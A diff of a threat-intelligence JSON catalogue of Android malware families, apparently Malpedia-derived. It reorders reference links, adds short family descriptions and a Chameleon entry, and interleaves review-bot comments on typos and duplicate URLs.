+ "https://pentest.blog/n-ways-to-unpack-mobile-malware/"
 ],
 "synonyms": [
 "BankBot",
@@ -298,8 +312,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy",
- "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/",
+ "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -348,7 +362,7 @@
 "value": "ATANK"
 },
 {
- "description": "",
+ "description": "remote access tool (RAT) payload on Android devices",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.badcall",
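Review bot: The rewritten `refs` list for `apk.anubis` still carries the securityboulevard URL twice, once with a trailing space inside the string (`"https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ "`) and once without; both are on the `+` side, so the duplicate survives this update rather than being cleaned up by it. A consumer that matches references exactly will count them as two distinct sources, and the trailing space is likely to produce a broken link when rendered. Trimming whitespace and de-duplicating URLs in the generator would fix it; if the list is copied verbatim from the upstream feed, the fix belongs there and this note is only a flag.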
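Review bot: The `apk.badcall` description added in the last hunk on this line is a lowercase fragment, `remote access tool (RAT) payload on Android devices`, while the other descriptions added in this update are full sentences that name the family. If descriptions are curated in this repository rather than copied from upstream, `BadCall is a remote access tool (RAT) payload for Android devices.` would match the neighbouring entries; the hunk does not show the rest of the BadCall entry, so I cannot tell whether anything else describes it.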
@@ -376,16 +390,16 @@
 "value": "BadPatch"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Bahamut is the name of Android malware with spyware functionality. Threat actors use Bahamut to steal sensitive information. The newest malware version targets various messaging apps and personally identifiable information.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut",
- "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/",
- "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/",
+ "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
 "https://blog.cyble.com/2022/06/29/bahamut-android-malware-returns-with-new-spying-capabilities/",
- "https://www.welivesecurity.com/2022/11/23/bahamut-cybermercenary-group-targets-android-users-fake-vpn-apps/",
 "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf",
+ "https://www.welivesecurity.com/2022/11/23/bahamut-cybermercenary-group-targets-android-users-fake-vpn-apps/",
+ "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/",
 "https://mp.weixin.qq.com/s/YAAybJBAvxqrQWYDg31BBw"
 ],
 "synonyms": [],
@@ -400,8 +414,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.basbanke",
 "https://securelist.com/basbanke-trend-setting-brazilian-banking-trojan/90365/",
- "https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/#.YHTDZS2tEUE",
- "https://twitter.com/LukasStefanko/status/1280243673100402690"
+ "https://twitter.com/LukasStefanko/status/1280243673100402690",
+ "https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/#.YHTDZS2tEUE"
 ],
 "synonyms": [],
 "type": []
@@ -414,12 +428,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian",
- "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html",
 "https://www.youtube.com/watch?v=DPFcvSy4OZk",
 "https://cryptax.medium.com/multidex-trick-to-unpack-android-bianlian-ed52eb791e56",
+ "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221",
 "https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html",
 "https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5",
- "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221",
+ "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html",
 "https://cryptax.medium.com/android-bianlian-payload-61febabed00a",
 "https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726"
 ],
@@ -432,7 +446,7 @@
 "value": "BianLian (Android)"
 },
 {
- "description": "",
+ "description": "According to PCrisk, BraDex is a banking malware targeting Android operating systems. This malicious program aims to gain access to victims' bank accounts and make fraudulent transactions.\r\n\r\nAt the time of writing, BrasDex targets Brazilian banking applications exclusively. In previous BrasDex campaigns, it infiltrated devices under the guise of Android system related apps. Lately, this malware has been installed by a fake Brazilian Banco Santander banking application.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.brasdex",
@@ -445,16 +459,16 @@
 "value": "BrasDex"
 },
 {
- "description": "",
+ "description": "According to Cleafy, the victim's Android device is factory reset after the attackers siphon money from the victim's bank account. This distracts users from the crime, while removing traces or footprints that might be of interest to forensic analysts.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata",
- "https://securelist.com/spying-android-rat-from-brazil-brata/92775/",
 "https://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your-bank-account",
- "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
+ "https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata-strikes-again",
+ "https://securelist.com/spying-android-rat-from-brazil-brata/92775/",
 "https://www.threatfabric.com/blogs/brata-a-tale-of-three-families.html",
- "https://www.cleafy.com/cleafy-labs/brata-is-evolving-into-an-advanced-persistent-threat",
- "https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata-strikes-again"
+ "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
+ "https://www.cleafy.com/cleafy-labs/brata-is-evolving-into-an-advanced-persistent-threat"
 ],
 "synonyms": [
 "AmexTroll"
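Review bot: The new `apk.brasdex` description misspells the family as `BraDex` in its first sentence while the entry's `value` is `BrasDex` and the later sentences use `BrasDex`; anyone searching the description text for the family name will miss the opening sentence. The same description embeds `\r\n\r\n` as a paragraph break, which none of the other descriptions added in this update do, so renderers will show a CRLF pair inside an otherwise single-line field. In the second hunk, the new `apk.brata` description opens with a behavioural detail (`the victim's Android device is factory reset after ...`) and never says what BRATA is; a lead-in such as `BRATA is an Android banking trojan/RAT; according to Cleafy, ...` would give the reader the identification the entry's references provide. If these descriptions are copied verbatim from the upstream source, the fixes belong there and this is only a flag.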
@@ -469,8 +483,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.brunhilda",
- "https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud",
 "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html",
+ "https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud",
 "https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf"
 ],
 "synonyms": [],
@@ -493,12 +507,13 @@
 "value": "BusyGasper"
 },
 {
- "description": "",
+ "description": "According to PCrisk, CapraRAT is the name of an Android remote access trojan (RAT), possibly a modified version of another (open-source) RAT called AndroRAT. It is known that CapraRAT is used by an advanced persistent threat group (ATP) called APT36 (also known as Earth Karkaddan). CapraRAT allows attackers to perform certain actions on the infected Android device.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.capra_rat",
 "https://www.welivesecurity.com/2023/03/07/love-scam-espionage-transparent-tribe-lures-indian-pakistani-officials/",
- "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html"
+ "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
+ "https://www.sentinelone.com/labs/capratube-transparent-tribes-caprarat-mimics-youtube-to-hijack-android-phones/"
 ],
 "synonyms": [],
 "type": []
@@ -524,8 +539,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites",
- "https://www.youtube.com/watch?v=1LOy0ZyjEOk",
- "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang"
+ "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang",
+ "https://www.youtube.com/watch?v=1LOy0ZyjEOk"
 ],
 "synonyms": [],
 "type": []
@@ -534,30 +549,30 @@
 "value": "Catelites"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Cerberus is an Android banking Trojan which can be rented on hacker forums. It was been created in 2019 and is used to steal sensitive, confidential information. Cerberus can also be used to send commands to users' devices and perform dangerous actions.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus",
- "https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf",
 "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html",
- "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html",
- "https://nur.pub/cerberus-analysis",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://securelist.com/the-state-of-stalkerware-in-2021/106193/",
 "https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus",
- "https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/",
- "https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/",
- "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html",
- "https://github.com/ics-iot-bootcamp/cerberus_research",
 "https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/",
- "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/",
 "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/",
+ "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/",
+ "https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12075509/EN_The-State-of-Stalkerware-2021.pdf",
+ "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html",
 "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
 "https://community.riskiq.com/article/85b3db8c",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12075509/EN_The-State-of-Stalkerware-2021.pdf",
+ "https://github.com/ics-iot-bootcamp/cerberus_research",
+ "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html",
+ "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf",
+ "https://nur.pub/cerberus-analysis",
 "https://twitter.com/AndroidCerberus",
- "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace"
+ "https://securelist.com/the-state-of-stalkerware-in-2021/106193/",
+ "https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/"
 ],
 "synonyms": [],
 "type": []
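Review bot: The new `apk.cerberus` description contains the ungrammatical `It was been created in 2019`, which should read `It was created in 2019`. Apart from that sentence and the reordering noted at the Alien hunk, this hunk only reorders the existing `refs`; no URL is added or dropped. If the description is copied verbatim from the upstream source the correction belongs there.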
@@ -565,14 +580,27 @@
 "uuid": "c3a2448f-bb41-4201-b524-3ddcb02ddbf4",
 "value": "Cerberus"
 },
+ {
+ "description": "The malware chamaleon is an Android trojan that pretends to be legitimate entities to steal data from users in Australia and Poland. It exploits the Accessibility Service to monitor and modify the device screen.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chameleon",
+ "https://blog.cyble.com/2023/04/13/chameleon-a-new-android-malware-spotted-in-the-wild/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "90b3a256-311d-416b-b333-e02b910ba75d",
+ "value": "Chameleon"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois",
- "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/",
+ "https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html",
 "https://github.com/maddiestone/ConPresentations/blob/master/KasperskySAS2019.Chamois.pdf",
- "https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html"
+ "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/"
 ],
 "synonyms": [],
 "type": []
@@ -585,10 +613,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger",
+ "http://blog.checkpoint.com/2017/01/24/charger-malware/",
 "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html",
- "https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf",
 "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-january-14-29-2017",
- "http://blog.checkpoint.com/2017/01/24/charger-malware/"
+ "https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf"
 ],
 "synonyms": [],
 "type": []
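Review bot: The new `apk.chameleon` entry's description spells the family `chamaleon` in lowercase while the entry's `value` and the Malpedia identifier are `Chameleon`, so a text search on the family name will not hit its own description. A first sentence such as `Chameleon is an Android trojan that impersonates legitimate entities to steal data from users in Australia and Poland.` keeps the stated facts and fixes the name. The new entry's `uuid` (`90b3a256-311d-416b-b333-e02b910ba75d`) cannot be checked for uniqueness from this hunk; if the repository has a uuid-collision check, this is the kind of addition it should run on.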
@@ -615,69 +643,69 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor",
- "https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/",
- "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html",
- "https://citizenlab.ca/2020/12/the-great-ipwn-journalists-hacked-with-suspected-nso-group-imessage-zero-click-exploit/",
- "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf",
- "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
- "https://thewire.in/tag/pegasus-project",
- "https://www.cyjax.com/2021/10/26/mercenary-apts-an-exploration/",
- "https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html",
- "https://nex.sx/blog/2021/08/03/the-pegasus-project.html",
- "https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html",
- "https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/",
- "https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5",
- "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/",
- "https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus",
- "https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/",
- "https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages",
- "https://twitter.com/alexanderjaeger/status/1417447732030189569",
- "https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure",
- "https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/",
- "https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/",
- "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/",
- "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/",
- "https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/",
- "https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/",
- "https://www.reuters.com/technology/how-saudi-womans-iphone-revealed-hacking-around-world-2022-02-17/",
- "https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/",
- "https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat",
- "https://twitter.com/billmarczak/status/1416801439402262529",
- "https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/",
- "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/",
- "https://media.ccc.de/v/33c3-7901-pegasus_internals",
- "https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/",
- "https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/",
- "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/",
- "https://objective-see.com/blog/blog_0x67.html",
- "https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus",
- "https://zetter.substack.com/p/pegasus-spyware-how-it-works-and",
- "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1",
- "https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/",
- "https://irpimedia.irpi.eu/sorveglianze-cy4gate/",
- "https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html",
- "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/",
- "https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying",
- "https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/",
- "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/",
- "https://citizenlab.ca/2022/04/peace-through-pegasus-jordanian-human-rights-defenders-and-journalists-hacked-with-pegasus-spyware/",
- "https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/",
- "https://lifars.com/2022/01/forensics-analysis-of-the-nso-groups-pegasus-spyware/",
 "https://thewire.in/media/pegasus-project-spyware-indian-journalists",
- "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
- "https://forbiddenstories.org/about-the-pegasus-project/",
- "https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests",
+ "https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/",
+ "https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus",
+ "https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/",
+ "https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto",
+ "https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5",
+ "https://objective-see.com/blog/blog_0x67.html",
+ "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1",
 "https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso",
- "https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/",
+ "https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html",
+ "https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/",
+ "https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests",
+ "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/",
+ "https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/",
+ "https://www.reuters.com/technology/how-saudi-womans-iphone-revealed-hacking-around-world-2022-02-17/",
+ "https://zetter.substack.com/p/pegasus-spyware-how-it-works-and",
+ "https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html",
 "https://citizenlab.ca/2021/07/amnesty-peer-review/",
- "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/",
- "https://citizenlab.ca/2021/11/palestinian-human-rights-defenders-hacked-nso-groups-pegasus-spyware/",
+ "https://media.ccc.de/v/33c3-7901-pegasus_internals",
+ "https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/",
+ "https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/",
+ "https://nex.sx/blog/2021/08/03/the-pegasus-project.html",
+ "https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/",
+ "https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html",
+ "https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus",
+ "https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/",
+ "https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages",
+ "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
+ "https://lifars.com/2022/01/forensics-analysis-of-the-nso-groups-pegasus-spyware/",
+ "https://twitter.com/HackSysTeam/status/1418223814387765258?s=20",
+ "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/",
+ "https://irpimedia.irpi.eu/sorveglianze-cy4gate/",
+ "https://forbiddenstories.org/about-the-pegasus-project/",
+ "https://twitter.com/alexanderjaeger/status/1417447732030189569",
+ "https://twitter.com/billmarczak/status/1416801439402262529",
 "https://www.theguardian.com/news/series/pegasus-project",
 "https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/",
+ "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html",
+ "https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/",
+ "https://citizenlab.ca/2022/04/peace-through-pegasus-jordanian-human-rights-defenders-and-journalists-hacked-with-pegasus-spyware/",
+ "https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/",
+ "https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/",
+ "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/",
+ "https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure",
+ "https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/",
+ "https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/",
+ "https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/",
+ "https://citizenlab.ca/2020/12/the-great-ipwn-journalists-hacked-with-suspected-nso-group-imessage-zero-click-exploit/",
+ "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/",
+ "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/",
+ "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf",
+ "https://thewire.in/tag/pegasus-project",
 "https://www.cybertrends.it/pegasus-lo-spyware-per-smartphone-come-funziona-e-come-ci-si-puo-proteggere/",
- "https://twitter.com/HackSysTeam/status/1418223814387765258?s=20"
+ "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
+ "https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/",
+ "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/",
+ "https://citizenlab.ca/2021/11/palestinian-human-rights-defenders-hacked-nso-groups-pegasus-spyware/",
+ "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/",
+ "https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat",
+ "https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/",
+ "https://www.cyjax.com/2021/10/26/mercenary-apts-an-exploration/"
 ],
 "synonyms": [
 "JigglyPuff",
@@ -706,9 +734,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clipper",
- "https://news.drweb.com/show?lng=en&i=12739",
 "https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/",
- "https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html"
+ "https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html",
+ "https://news.drweb.com/show?lng=en&i=12739"
 ],
 "synonyms": [],
 "type": []
@@ -762,16 +790,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.coper", - "https://cert.pl/posts/2021/12/aktywacja-aplikacji-iko/", - "https://www.trendmicro.com/en_us/research/22/g/examining-new-dawdropper-banking-dropper-and-daas-on-the-dark-we.html", - "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/", - "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html", "https://cert-agid.gov.it/news/analisi-e-approfondimenti-tecnici-sul-malware-coper-utilizzato-per-attaccare-dispositivi-mobili/", - "https://twitter.com/_icebre4ker_/status/1541875982684094465", + "https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0", + "https://labs.k7computing.com/index.php/play-store-app-serves-coper-via-github/", "https://blog.cyble.com/2022/03/24/coper-banking-trojan/", "https://thehackernews.com/2022/04/new-octo-banking-trojan-spreading-via.html", - "https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0", - "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace" + "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/", + "https://www.trendmicro.com/en_us/research/22/g/examining-new-dawdropper-banking-dropper-and-daas-on-the-dark-we.html", + "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html", + "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace", + "https://twitter.com/_icebre4ker_/status/1541875982684094465", + "https://cert.pl/posts/2021/12/aktywacja-aplikacji-iko/" ], "synonyms": [ "ExobotCompact", 
@@ -787,8 +816,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.corona_worm",
- "https://www.zscaler.com/blogs/research/new-android-app-offers-coronavirus-safety-mask-delivers-sms-trojan",
- "https://dissectingmalwa.re/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html"
+ "https://dissectingmalwa.re/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html",
+ "https://www.zscaler.com/blogs/research/new-android-app-offers-coronavirus-safety-mask-delivers-sms-trojan"
 ],
 "synonyms": [],
 "type": []
@@ -810,7 +839,7 @@
 "value": "Cpuminer (Android)"
 },
 {
- "description": "",
+ "description": "According to NHS Digital, CryCryptor is distributed via websites that spoof health organisations. At the time of publication these websites have affected the Canadian health service. CryCryptor cannot be obtained from the Google Play store, so devices restricted to only running apps from the store are not affected.\r\n\r\nWhen CryCryptor is run it encrypts common file types and saves a ransom note to every directory where files have been encrypted. Encrypted files have the extension '.enc' appended to the filenames. Additional files are saved containing the salt values used in each encryption and an initialisation vector. These files have the extensions '.enc.salt' and '.enc.iv' respectively.\r\n\r\nWhen files have been encrypted, a notification is displayed directing users to open the ransom note.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.crycryptor",
